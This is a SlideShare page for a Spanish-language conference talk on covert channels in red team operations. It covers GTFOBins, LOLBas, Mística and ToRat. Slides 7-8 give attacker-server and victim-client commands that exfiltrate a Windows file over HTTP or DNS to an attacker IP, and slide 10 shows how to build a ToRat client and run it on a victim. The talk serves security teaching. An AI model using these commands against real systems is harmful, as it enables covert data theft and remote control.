SlideShare una empresa de Scribd logo
#XIVJORNADASCCNCERT
Covert Channels en
operaciones de Red Team
Foto ponente
Daniel Echeverri aka. Adastra
The Hacker Way.
adastra@thehackerway.com

Introducción rápida a los canales encubiertos.

Herramientas y técnicas disponibles para la
creación de canales encubiertos en post-
explotación.
Agenda
Covert Channels en operaciones de Red Team

Técnicas enfocadas a la exfiltración de información entre atacante
y víctima utilizando medios habituales que no han sido diseñados
para dicho propósito y que rompen con la política de seguridad

Uno de los objetivos de la creación de canales encubiertos
consiste en evadir mecanismos de detección y/o censura.

Se emplean protocolos de comunicación comunes tales como
HTTP, DNS, ICMP entre otros. La información se transmite en
campos o secciones concretas de los paquetes de datos
típicamente codificada o cifrada. El atacante recibe estos paquetes
y debe poder descifrar la información contenida en dichos campos.
Introducción rápida.
Covert Channels en operaciones de Red Team

GTFOBins (Unix-Like) y LOLBas (Windows)

En ambos proyectos se encuentran disponibles binarios que
permiten la transmisión de información (file upload y/o file
download).

Una de las características más llamativas de estos proyectos es
que se trata de una colección de binarios “confiables” en estos
sistemas operativos que pueden ser empleados para labores de
post-explotación, incluyendo la exfiltración.

GTFOBins: https://gtfobins.github.io/

LOLBas: https://lolbas-project.github.io/
Algunas técnicas y herramientas disponibles
Covert Channels en operaciones de Red Team

Uso de Mística: https://github.com/IncideDigital/Mistica

Herramienta que permite embeber información en protocolos
habituales en la capa de aplicación (p.e. HTTP o DNS).

Define un protocolo personalizado para la transmisión de
información por medio del solapamiento de datos llamado SOTP
(Simple Overlay Transport Protocol). En este protocolo la
información a transmitir se divide en bloques, se cifra y se envía al
servidor (atacante).

El protocolo SOTP en Mística permite utilizar campos concretos en
el protocolo de aplicación seleccionado, con el objetivo de
transmitir información.
Algunas técnicas y herramientas disponibles
Covert Channels en operaciones de Red Team

Mística protocolo HTTP:

En el servidor (atacante):
python3.8 ms.py -m io:http -k "rc4testing" -s "--hostname
192.168.1.116 --port 9090"

En el cliente (víctima):
python mc.py -m io:http -k "rc4testing" -w "--hostname
192.168.1.116 --port 9090" < C:Windowswin.ini
Algunas técnicas y herramientas disponibles
Covert Channels en operaciones de Red Team

Mística protocolo DNS:

En el servidor (atacante):
python3.8 ms.py -m io:dns -k "rc4testing" -s "--hostname
192.168.1.1116 --port 9090" -w "--queries SOA"

En el cliente (víctima):
python mc.py -m io:dns -k "rc4testing" -w "--hostname
192.168.1.116 --port 9090 --query SOA" < C:Windowswin.ini
Algunas técnicas y herramientas disponibles
Covert Channels en operaciones de Red Team

Uso de ToRat: https://github.com/lu4p/ToRat

Proyecto que se define como una herramienta para
administración remota (Remote Administration Tool: RAT) pero que
dadas sus características puede ser empleada para el
establecimiento de side channels (canales ocultos).

El proyecto utiliza una librería en Go llamada Bine (
https://github.com/cretz/bine/) la cual es una implementación del
protocolo de control de TOR y permite embeber una instancia de
TOR en un binario.
Algunas técnicas y herramientas disponibles
Covert Channels en operaciones de Red Team
Uso de ToRat.
1- cd <TORAT_DIR> && docker build -t adastraa/torat .
2- docker run -it -v "$(pwd)"/dist:/dist_ext adastraa/torat
Se genera el cliente para Windows y Linux en:
<ToRat_DIR>/dist/dist/client se envía el binario
correspondiente a la víctima y se ejecuta.
3- Se recibe la conexión y se selecciona la víctima con el
comando select
Algunas técnicas y herramientas disponibles
Covert Channels en operaciones de Red Team
MUCHAS
GRACIAS

Más contenido relacionado

PPT
Clase 03 Protocolos Y Servicios De Red
PPT
Cisco Cybersecurity Essential cap 4
PDF
Webinar Gratuito: Analizar Tráfico de Red con Tshark
PPTX
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
PPTX
Encriptacion HMAC
PDF
Eduardo Sanchez & Rafael Sojo - Taller de CTF [rooted2018]
PDF
Seguridad wi fi wep-wpa_wpa2
PPT
Exploracion de puertos de redes
Clase 03 Protocolos Y Servicios De Red
Cisco Cybersecurity Essential cap 4
Webinar Gratuito: Analizar Tráfico de Red con Tshark
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Encriptacion HMAC
Eduardo Sanchez & Rafael Sojo - Taller de CTF [rooted2018]
Seguridad wi fi wep-wpa_wpa2
Exploracion de puertos de redes

La actualidad más candente (10)

PDF
Escaneo, enumeración de puertos en la red. OMHE
PPT
Tcpdump a.2
PDF
Gestiondeauditoriasdeseguridad
PDF
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
PDF
Manual tecnicas de_scaning
PDF
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
PDF
Denegacion de servicio
PPT
Pitufo Isa Server 2 K6
PPT
Manual para romper contraseñas WEP y WPA
PDF
Actividad No 4.3 IPv4 SSH
Escaneo, enumeración de puertos en la red. OMHE
Tcpdump a.2
Gestiondeauditoriasdeseguridad
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
Manual tecnicas de_scaning
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Denegacion de servicio
Pitufo Isa Server 2 K6
Manual para romper contraseñas WEP y WPA
Actividad No 4.3 IPv4 SSH
Publicidad

Similar a XIV Jornadas CCN Cert: Covert Channels en operaciones de Red Team (7)

PPTX
Ataques de suplantación de identidad
PDF
Intro cybersecurity additional resources and activities
PPTX
Configuracion tcp
ODP
Pexacuxa de la Unidad 1 de interconexiones de redes
PDF
Unidad 6 Seguridad en redes corporativas
PPTX
Interconexión de redes privadas con redes públicas.
PDF
Segurida de redes
Ataques de suplantación de identidad
Intro cybersecurity additional resources and activities
Configuracion tcp
Pexacuxa de la Unidad 1 de interconexiones de redes
Unidad 6 Seguridad en redes corporativas
Interconexión de redes privadas con redes públicas.
Segurida de redes
Publicidad

Más de Dani Adastra (19)

PDF
IntelCon 2020: Uso avanzado de ZAP para hacking en aplicaciones web
PDF
ShellCon 2018: Hacking con Python
PDF
Malt 2020: Ciberseguridad en la empresa
PDF
IntelCon 2020: OSINT en la Deep web de TOR
PDF
HoneyCon 2020: Hacking con ZAP
PDF
HackMadrid 2020: Introducción práctica al RedTeam
PDF
8dot8 SUR 2020: Introducción práctica al RedTeam
PDF
SecAdmin 2019: ZAP Proxy: Mucho más que una herramienta de "one-click hack"
PDF
Morteruelo 2019: Seguridad informática en 50 días YOUR hacker way..
PDF
HackRon 2019: Python + TOR: Descubrir, analizar y extraer información de serv...
PDF
H-Con 2018: Hacking con Python
PDF
UAH 2018: Hacking en la deep web de TOR (for fun and profit)
PPTX
SecAdmin 2017: Hacking con Python
PDF
DragonJar 2015: Desmitificando la deep web de tor pentesting sobre instancias...
PDF
Cybercamp 2014: Tortazo: Desarrollo de un framework de auditoría para la red ...
PDF
HoneyCon 2017: Pentesting sobre instancias de TOR con Tortazo y TortazoWeb.
PDF
8dot8 2015: Desmitificando la deep web de TOR - pentesting sobre instancias d...
PDF
Cybercamp 2017: Hacking TOR & Freenet for fun, profit and stop the evil.
PDF
Codemotion 2017: Pentesting en aplicaciones node.js AS ALWAYS: FOR FUN AND PR...
IntelCon 2020: Uso avanzado de ZAP para hacking en aplicaciones web
ShellCon 2018: Hacking con Python
Malt 2020: Ciberseguridad en la empresa
IntelCon 2020: OSINT en la Deep web de TOR
HoneyCon 2020: Hacking con ZAP
HackMadrid 2020: Introducción práctica al RedTeam
8dot8 SUR 2020: Introducción práctica al RedTeam
SecAdmin 2019: ZAP Proxy: Mucho más que una herramienta de "one-click hack"
Morteruelo 2019: Seguridad informática en 50 días YOUR hacker way..
HackRon 2019: Python + TOR: Descubrir, analizar y extraer información de serv...
H-Con 2018: Hacking con Python
UAH 2018: Hacking en la deep web de TOR (for fun and profit)
SecAdmin 2017: Hacking con Python
DragonJar 2015: Desmitificando la deep web de tor pentesting sobre instancias...
Cybercamp 2014: Tortazo: Desarrollo de un framework de auditoría para la red ...
HoneyCon 2017: Pentesting sobre instancias de TOR con Tortazo y TortazoWeb.
8dot8 2015: Desmitificando la deep web de TOR - pentesting sobre instancias d...
Cybercamp 2017: Hacking TOR & Freenet for fun, profit and stop the evil.
Codemotion 2017: Pentesting en aplicaciones node.js AS ALWAYS: FOR FUN AND PR...

Último (20)

PDF
programa-de-estudios-2011-guc3ada-para-el-maestro-secundarias-tecnicas-tecnol...
PPTX
Sesion 1 de microsoft power point - Clase 1
PDF
ADMINISTRACIÓN DE ARCHIVOS - TICS (SENA).pdf
PPTX
ANCASH-CRITERIOS DE EVALUACIÓN-FORMA-10-10 (2).pptx
PPTX
sa-cs-82-powerpoint-hardware-y-software_ver_4.pptx
PPTX
Presentación PASANTIAS AuditorioOO..pptx
PPTX
Acronis Cyber Protect Cloud para Ciber Proteccion y Ciber Seguridad LATAM - A...
PPT
introduccion a las_web en el 2025_mejoras.ppt
PPTX
RAP01 - TECNICO SISTEMAS TELEINFORMATICOS.pptx
PPTX
la-historia-de-la-medicina Edna Silva.pptx
PDF
Ronmy José Cañas Zambrano - Potenciando la tecnología en Venezuela.pdf
PPTX
modulo seguimiento 1 para iniciantes del
PPTX
Presentación de Redes de Datos modelo osi
PDF
capacitación de aire acondicionado Bgh r 410
PDF
MANUAL de recursos humanos para ODOO.pdf
PDF
Influencia-del-uso-de-redes-sociales.pdf
PDF
clase auditoria informatica 2025.........
PPTX
COMO AYUDAN LAS TIC EN LA EDUCACION SUPERIOR.pptx
PPTX
IA de Cine - Como MuleSoft y los Agentes estan redefiniendo la realidad
PPTX
historia_web de la creacion de un navegador_presentacion.pptx
programa-de-estudios-2011-guc3ada-para-el-maestro-secundarias-tecnicas-tecnol...
Sesion 1 de microsoft power point - Clase 1
ADMINISTRACIÓN DE ARCHIVOS - TICS (SENA).pdf
ANCASH-CRITERIOS DE EVALUACIÓN-FORMA-10-10 (2).pptx
sa-cs-82-powerpoint-hardware-y-software_ver_4.pptx
Presentación PASANTIAS AuditorioOO..pptx
Acronis Cyber Protect Cloud para Ciber Proteccion y Ciber Seguridad LATAM - A...
introduccion a las_web en el 2025_mejoras.ppt
RAP01 - TECNICO SISTEMAS TELEINFORMATICOS.pptx
la-historia-de-la-medicina Edna Silva.pptx
Ronmy José Cañas Zambrano - Potenciando la tecnología en Venezuela.pdf
modulo seguimiento 1 para iniciantes del
Presentación de Redes de Datos modelo osi
capacitación de aire acondicionado Bgh r 410
MANUAL de recursos humanos para ODOO.pdf
Influencia-del-uso-de-redes-sociales.pdf
clase auditoria informatica 2025.........
COMO AYUDAN LAS TIC EN LA EDUCACION SUPERIOR.pptx
IA de Cine - Como MuleSoft y los Agentes estan redefiniendo la realidad
historia_web de la creacion de un navegador_presentacion.pptx

XIV Jornadas CCN Cert: Covert Channels en operaciones de Red Team

  • 2. Foto ponente Daniel Echeverri aka. Adastra The Hacker Way. adastra@thehackerway.com
  • 3.  Introducción rápida a los canales encubiertos.  Herramientas y técnicas disponibles para la creación de canales encubiertos en post- explotación. Agenda Covert Channels en operaciones de Red Team
  • 4.  Técnicas enfocadas a la exfiltración de información entre atacante y víctima utilizando medios habituales que no han sido diseñados para dicho propósito y que rompen con la política de seguridad  Uno de los objetivos de la creación de canales encubiertos consiste en evadir mecanismos de detección y/o censura.  Se emplean protocolos de comunicación comunes tales como HTTP, DNS, ICMP entre otros. La información se transmite en campos o secciones concretas de los paquetes de datos típicamente codificada o cifrada. El atacante recibe estos paquetes y debe poder descifrar la información contenida en dichos campos. Introducción rápida. Covert Channels en operaciones de Red Team
  • 5.  GTFOBins (Unix-Like) y LOLBas (Windows)  En ambos proyectos se encuentran disponibles binarios que permiten la transmisión de información (file upload y/o file download).  Una de las características más llamativas de estos proyectos es que se trata de una colección de binarios “confiables” en estos sistemas operativos que pueden ser empleados para labores de post-explotación, incluyendo la exfiltración.  GTFOBins: https://gtfobins.github.io/  LOLBas: https://lolbas-project.github.io/ Algunas técnicas y herramientas disponibles Covert Channels en operaciones de Red Team
  • 6.  Uso de Mística: https://github.com/IncideDigital/Mistica  Herramienta que permite embeber información en protocolos habituales en la capa de aplicación (p.e. HTTP o DNS).  Define un protocolo personalizado para la transmisión de información por medio del solapamiento de datos llamado SOTP (Simple Overlay Transport Protocol). En este protocolo la información a transmitir se divide en bloques, se cifra y se envía al servidor (atacante).  El protocolo SOTP en Mística permite utilizar campos concretos en el protocolo de aplicación seleccionado, con el objetivo de transmitir información. Algunas técnicas y herramientas disponibles Covert Channels en operaciones de Red Team
  • 7.  Mística protocolo HTTP:  En el servidor (atacante): python3.8 ms.py -m io:http -k "rc4testing" -s "--hostname 192.168.1.116 --port 9090"  En el cliente (víctima): python mc.py -m io:http -k "rc4testing" -w "--hostname 192.168.1.116 --port 9090" < C:Windowswin.ini Algunas técnicas y herramientas disponibles Covert Channels en operaciones de Red Team
  • 8.  Mística protocolo DNS:  En el servidor (atacante): python3.8 ms.py -m io:dns -k "rc4testing" -s "--hostname 192.168.1.1116 --port 9090" -w "--queries SOA"  En el cliente (víctima): python mc.py -m io:dns -k "rc4testing" -w "--hostname 192.168.1.116 --port 9090 --query SOA" < C:Windowswin.ini Algunas técnicas y herramientas disponibles Covert Channels en operaciones de Red Team
  • 9.  Uso de ToRat: https://github.com/lu4p/ToRat  Proyecto que se define como una herramienta para administración remota (Remote Administration Tool: RAT) pero que dadas sus características puede ser empleada para el establecimiento de side channels (canales ocultos).  El proyecto utiliza una librería en Go llamada Bine ( https://github.com/cretz/bine/) la cual es una implementación del protocolo de control de TOR y permite embeber una instancia de TOR en un binario. Algunas técnicas y herramientas disponibles Covert Channels en operaciones de Red Team
  • 10. Uso de ToRat. 1- cd <TORAT_DIR> && docker build -t adastraa/torat . 2- docker run -it -v "$(pwd)"/dist:/dist_ext adastraa/torat Se genera el cliente para Windows y Linux en: <ToRat_DIR>/dist/dist/client se envía el binario correspondiente a la víctima y se ejecuta. 3- Se recibe la conexión y se selecciona la víctima con el comando select Algunas técnicas y herramientas disponibles Covert Channels en operaciones de Red Team